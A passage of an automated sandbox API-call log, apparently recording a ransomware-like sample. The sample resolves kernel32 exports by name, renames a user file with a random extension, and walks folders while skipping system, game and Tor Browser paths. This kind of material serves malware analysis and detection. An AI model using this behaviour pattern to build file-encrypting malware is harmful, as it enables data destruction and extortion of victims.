lpString1="CreateFileW") returned="CreateFileW" [0180.826] lstrlenA (lpString="CREATEFILEW") returned 11 [0180.826] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0180.826] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0180.826] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0180.826] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0180.826] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0180.826] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0180.826] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0180.826] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0180.826] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0180.826] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0180.827] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0180.827] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0180.827] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0180.827] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0180.827] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0180.827] lstrlenA (lpString="CREATEJOBSET") returned 12 [0180.827] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0180.827] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0180.827] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0180.827] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0180.827] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0180.827] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0180.827] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0180.827] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0180.827] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0180.827] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0180.827] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0180.827] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0180.827] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0180.827] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0180.827] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0180.827] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0180.827] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0180.827] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0180.827] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0180.827] lstrlenA (lpString="CREATEPIPE") returned 10 [0180.827] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0180.827] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0180.827] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0180.827] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0180.827] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0180.827] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0180.827] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0180.827] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0180.827] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0180.827] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0180.827] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0180.827] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0180.827] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0180.828] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0180.828] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0180.828] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0180.828] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0180.828] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0180.828] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0180.828] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0180.828] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0180.828] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0180.828] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0180.828] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0180.828] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0180.828] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0180.828] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0180.828] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0180.828] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0180.828] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0180.828] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0180.828] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0180.828] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0180.828] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0180.829] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0180.829] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0180.829] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0180.829] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0180.829] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0180.829] lstrlenA (lpString="CREATETHREAD") returned 12 [0180.829] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0180.829] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0180.829] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0180.829] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0180.829] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0180.829] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0180.829] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0180.829] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0180.829] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0180.829] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0180.829] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0180.829] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0180.829] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0180.829] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0180.829] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0180.829] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0180.829] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0180.829] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0180.829] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0180.829] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0180.829] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0180.829] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0180.829] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0180.829] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0180.829] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0180.829] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0180.829] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0180.829] lstrlenA (lpString="CTRLROUTINE") returned 11 [0180.829] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0180.829] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0180.829] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0180.829] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0180.830] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0180.830] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0180.830] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0180.830] lstrlenA (lpString="DEBUGBREAK") returned 10 [0180.830] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0180.830] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0180.830] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0180.830] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0180.830] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0180.830] lstrlenA (lpString="DECODEPOINTER") returned 13 [0180.830] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0180.830] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0180.830] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0180.830] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0180.830] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0180.830] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0180.830] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0180.830] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0180.830] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0180.830] lstrlenA (lpString="DELETEATOM") returned 10 [0180.830] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0180.830] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0180.830] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0180.830] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0180.830] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0180.830] lstrlenA (lpString="DELETEFIBER") returned 11 [0180.830] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0180.830] lstrlenA (lpString="DELETEFILEA") returned 11 [0180.830] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0180.830] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0180.830] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0180.830] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0180.830] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0180.830] lstrlenA (lpString="DELETEFILEW") returned 11 [0180.830] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0180.830] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0180.830] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0180.830] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0180.830] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0180.831] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0180.831] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0180.831] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0180.831] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0180.831] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0180.831] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0180.831] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0180.831] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0180.831] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0180.831] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0180.831] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0180.831] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0180.831] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0180.831] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0180.831] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0180.831] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0180.831] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0180.831] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0180.831] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0180.831] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0180.831] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0180.831] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0180.831] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0180.831] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0180.831] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0180.831] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0180.831] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0180.831] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0180.831] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0180.831] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0180.831] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0180.831] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0180.831] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0180.831] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0180.831] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0180.831] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0180.831] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0180.831] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0180.831] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0180.832] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0180.832] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0180.832] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0180.832] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0180.832] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0180.832] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0180.832] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0180.832] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0180.832] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0180.832] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0180.832] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0180.832] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0180.832] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0180.832] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0180.832] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0180.832] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0180.832] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0180.832] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0180.832] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0180.832] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0180.832] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0180.832] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0180.832] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0180.832] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0180.832] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST.EOKT") returned 77 [0180.832] wsprintfW (in: param_1=0x36fdd64, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST.EOKT.wvJTkF") returned 84 [0180.832] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST.EOKT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\synchist.eokt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST.EOKT.wvJTkF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\synchist.eokt.wvjtkf"), dwFlags=0x0) returned 1 [0180.844] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.845] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.845] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.845] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x2b1e4b40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2b1e4b40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xaaf5ad40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x154, dwReserved0=0x0, dwReserved1=0x0, cFileName="SYNCHIST.EOKT", cAlternateFileName="SYNCHI~1.EOK")) returned 0 [0180.845] FindClose (in: hFindFile=0x479938 | out: hFindFile=0x479938) returned 1 [0180.845] CloseHandle (hObject=0x26c) returned 1 [0180.845] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x43bcc750, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaaf80ea0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaf80ea0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Publisher", cAlternateFileName="PUBLIS~1")) returned 1 [0180.845] lstrcmpW (lpString1="Publisher", lpString2=".") returned 1 [0180.845] lstrcmpW (lpString1="Publisher", lpString2="..") returned 1 [0180.845] lstrcatW (in: lpString1="Publisher", lpString2="\\" | out: lpString1="Publisher\\") returned="Publisher\\" [0180.845] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="Publisher\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\" [0180.845] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\", lpSrch="\\Program Files") returned 0x0 [0180.845] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\", lpSrch=":\\Windows") returned 0x0 [0180.845] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\", lpSrch="\\Games\\") returned 0x0 [0180.845] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.846] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.846] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.846] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.846] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS 